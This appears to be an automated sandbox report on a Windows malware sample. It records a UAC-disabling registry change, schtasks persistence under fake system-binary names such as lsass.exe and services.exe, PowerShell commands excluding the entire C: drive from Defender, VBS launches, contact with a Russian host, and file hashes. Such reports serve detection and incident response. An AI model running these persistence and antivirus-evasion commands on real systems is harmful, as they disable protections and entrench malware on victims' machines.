Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default User\services.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe

"C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Portable Devices\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Portable Devices\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\3D Objects\TextInputHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\Admin\3D Objects\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\3D Objects\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\sihost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Admin\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Internet Explorer\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Internet Explorer\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Users\Default User\services.exe

"C:\Users\Default User\services.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f490bd04-381f-4110-b2f4-69e539b85018.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\839b3450-24a3-4e67-8674-a625305c3232.vbs"

C:\Users\Default User\services.exe

"C:\Users\Default User\services.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1eabff37-6dcb-470a-a6cf-a9b5df879a3e.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\da615cdd-6344-489f-871c-cf15683b8ce4.vbs"

C:\Users\Default User\services.exe

"C:\Users\Default User\services.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9f9ca633-4a53-4add-a9ba-d4ee09a483b9.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1225dcb2-f8d0-4026-b32b-36261ff0439a.vbs"

C:\Users\Default User\services.exe

"C:\Users\Default User\services.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d97266aa-c4c2-4a9c-af28-fac549d3e104.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\da164d95-aaec-4577-a2e5-c432becd440b.vbs"

C:\Users\Default User\services.exe

"C:\Users\Default User\services.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3adf8a14-133a-4c67-8f03-ebe7b621242d.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4549df5f-7cc5-4942-a65a-7f572a38378d.vbs"

C:\Users\Default User\services.exe

"C:\Users\Default User\services.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8780267c-9c36-4cc0-8175-f6c024588326.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\58f2568b-b154-44a6-896a-a017af9fb059.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 a0887556.xsph.ru udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
US 8.8.8.8:53 42.197.8.141.in-addr.arpa udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
US 8.8.8.8:53 224.162.46.104.in-addr.arpa udp

Files

memory/600-0-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

memory/600-1-0x00000000004C0000-0x00000000007FC000-memory.dmp

memory/600-2-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/600-3-0x000000001B3F0000-0x000000001B3FE000-memory.dmp

memory/600-4-0x000000001B510000-0x000000001B51E000-memory.dmp

memory/600-6-0x000000001B530000-0x000000001B54C000-memory.dmp

memory/600-5-0x000000001B520000-0x000000001B528000-memory.dmp

memory/600-7-0x000000001BAE0000-0x000000001BB30000-memory.dmp

memory/600-9-0x000000001B560000-0x000000001B570000-memory.dmp

memory/600-8-0x000000001B550000-0x000000001B558000-memory.dmp

memory/600-13-0x000000001B5B0000-0x000000001B5BA000-memory.dmp

memory/600-12-0x000000001B5A0000-0x000000001B5B0000-memory.dmp

memory/600-11-0x000000001B590000-0x000000001B598000-memory.dmp

memory/600-10-0x000000001B570000-0x000000001B586000-memory.dmp

memory/600-14-0x000000001BB30000-0x000000001BB86000-memory.dmp

memory/600-15-0x000000001B5C0000-0x000000001B5CC000-memory.dmp

memory/600-16-0x000000001BB80000-0x000000001BB88000-memory.dmp

memory/600-17-0x000000001BB90000-0x000000001BB9C000-memory.dmp

memory/600-18-0x000000001BBA0000-0x000000001BBA8000-memory.dmp

memory/600-19-0x000000001BBB0000-0x000000001BBC2000-memory.dmp

memory/600-20-0x000000001C110000-0x000000001C638000-memory.dmp

memory/600-22-0x000000001BBF0000-0x000000001BBFC000-memory.dmp

memory/600-23-0x000000001BC00000-0x000000001BC0C000-memory.dmp

memory/600-21-0x000000001BBE0000-0x000000001BBEC000-memory.dmp

memory/600-24-0x000000001BC10000-0x000000001BC1C000-memory.dmp

memory/600-25-0x000000001BD20000-0x000000001BD28000-memory.dmp

memory/600-30-0x000000001BE70000-0x000000001BE7C000-memory.dmp

memory/600-26-0x000000001BD30000-0x000000001BD3A000-memory.dmp

memory/600-29-0x000000001BE60000-0x000000001BE6E000-memory.dmp

memory/600-28-0x000000001BE50000-0x000000001BE58000-memory.dmp

memory/600-27-0x000000001BD40000-0x000000001BD4E000-memory.dmp

memory/600-32-0x000000001B3B0000-0x000000001B3BA000-memory.dmp

memory/600-31-0x000000001B3A0000-0x000000001B3A8000-memory.dmp

memory/600-34-0x000000001B3C0000-0x000000001B3CC000-memory.dmp

memory/600-33-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/600-37-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

C:\Users\Default\services.exe

MD5 a785b1ff3467b61f4506c7022ad13e31
SHA1 9f76c04963f2de14f4aaa13dcf9af98f79f89a91
SHA256 25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8
SHA512 ca56b31a25b23de63fc7131788c350f0081c5673fc7456781a93f2ec9852948d5500e5fd06c30924dd6614e7bc2a1bc9346f02e067a06bb4b26c96f70f6ad0c9

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcxg4bnm.2rq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3960-184-0x00000215371A0000-0x00000215371C2000-memory.dmp

memory/600-277-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e448fe0d240184c6597a31d3be2ced58
SHA1 372b8d8c19246d3e38cd3ba123cc0f56070f03cd
SHA256 c660f0db85a1e7f0f68db19868979bf50bd541531babf77a701e1b1ce5e6a391
SHA512 0b7f7eae7700d32b18eee3677cb7f89b46ace717fa7e6b501d6c47d54f15dff7e12b49f5a7d36a6ffe4c16165c7d55162db4f3621db545b6af638035752beab4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5f0ddc7f3691c81ee14d17b419ba220d
SHA1 f0ef5fde8bab9d17c0b47137e014c91be888ee53
SHA256 a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5
SHA512 2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6c47b3f4e68eebd47e9332eebfd2dd4e
SHA1 67f0b143336d7db7b281ed3de5e877fa87261834
SHA256 8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c
SHA512 0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

C:\Users\Admin\AppData\Local\Temp\f490bd04-381f-4110-b2f4-69e539b85018.vbs

MD5 df2fcad7a51f1a244cf0a80b725cbbf8
SHA1 1e2844a65314477800b86cd1da423b528c23dc6a
SHA256 12da7a0d4cac26a431f5a0dfb7957e1ba255f541023efab76647d94c12b59d7b
SHA512 12b6e1982cb39e17cf95f8b203bcaaaf47315e03ab63c8aaf26b4f53a7160e09cca26bae9649dd2498bd89bc1d08bb6bdaecfa56e8faf58e4e0a93d554e96f49

C:\Users\Admin\AppData\Local\Temp\839b3450-24a3-4e67-8674-a625305c3232.vbs

MD5 715c871c0f4ef8424c8efaa4a8745b44
SHA1 b0c4a9361513e062db22790c51e154e8596ac387
SHA256 c1740437a1c150e18e1322ecb7c7c5868b2ae64207c41f7a48e82dd29567b07a
SHA512 742be3f9ee3bbd7ee7df9be12e45956d2d25ca223e7ca4ec7ff894a11b776d996cf217f1627ef8e2f99513b2c7cc87c0a67497d20a0cb94bf3a098b255d6a68c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services.exe.log

MD5 49b64127208271d8f797256057d0b006
SHA1 b99bd7e2b4e9ed24de47fb3341ea67660b84cca1
SHA256 2a5d403a2e649d8eceef8f785eeb0f6d33888ec6bbf251b3c347e34cb32b1e77
SHA512 f7c728923c893dc9bc88ad2159e0abcda41e1b40ff7e7756e6252d135ed238a2248a2662b3392449836dd1b0b580f0c866cc33e409527484fe4602e3d3f10e3e

C:\Users\Admin\AppData\Local\Temp\1eabff37-6dcb-470a-a6cf-a9b5df879a3e.vbs

MD5 b40af556863e5b1cb4d081744235d79b
SHA1 4f4390bc932300dd6825d91b51fc625095d9447f
SHA256 ff8d7197792546a46fb5bc1dc5ec90bd456dbbe8225ed9a69b1c6c04f1ab839e
SHA512 9142e59f7775760b12d3583134d0e279c40e2eef27a499faac9369483c14599e8b4b83fbf8b782c4cc24b303bc66ba0496a25e06166d2c4d55499ba8207af208

C:\Users\Admin\AppData\Local\Temp\9f9ca633-4a53-4add-a9ba-d4ee09a483b9.vbs

MD5 0f11a3524275f7dac5008badd4273156
SHA1 c1821327faca1b50a94d917382900c6c8c0ebde7
SHA256 c3c983d968263aa7698a71ce3daabf015ccc36354698af72b3644d9816d8722c
SHA512 09940945ff5bfb002eb6f0b1e52cb56b7f4c3405b26e9cb27269e998830b887ae7fe68a5b56896576f91493dd4b239879d76e6eb36fcd1a505983404e40c7e38

memory/4780-331-0x000000001D3F0000-0x000000001D402000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\d97266aa-c4c2-4a9c-af28-fac549d3e104.vbs

MD5 785896c02460df8ca35da5817eab03a7
SHA1 17019a35baec37bdedeed1fd8d2bdcc811fb7669
SHA256 d8d3617d0698982fddbd258b328ce43d3f59f5f417dadccce533b71b525c1340
SHA512 5f46d5e8832e5a3fe6caee28e9bee954d0f9bb28298774c7c42e84cf2170dc29e67e9461d632d72a8d4d3d4308c95f40b4d2b1cd711bedb80c0f22ef980368d4

C:\Users\Admin\AppData\Local\Temp\3adf8a14-133a-4c67-8f03-ebe7b621242d.vbs

MD5 1f8960960182cfe2ecb19fa1e88251bf
SHA1 72f194aa70275490e507328a65ecc59b8dd49c02
SHA256 7f5de31245e76733d7e145d421e2c8c1047ced638c95c2dfaca00fb688fa0013
SHA512 ce1c1a6bd3b680b02187b48f5b14963f5f4d299141a3d7e04bbfbe0efd1acd0a747b0dda010293cb747072741293a6942e89fadb5e5f83f17bc794c5d7fb60cf

C:\Users\Admin\AppData\Local\Temp\8780267c-9c36-4cc0-8175-f6c024588326.vbs

MD5 57528296f004694acf04c9d1fcf50bfc
SHA1 4d89d19acb0b85726952e3df9a03670c16e7b455
SHA256 22fc8aa44b9206d5e13da3d61d613bbd89059adba760b5dc13055f675f7fcf44
SHA512 eaa8694efc95aee8d0a7fc8eb1725742ddd69a2781524b4ebb7fd9cdaf65b70646056e0f042c540e100b53c20d4ecadd8fddec44402e91b2e0c344b976eaefdc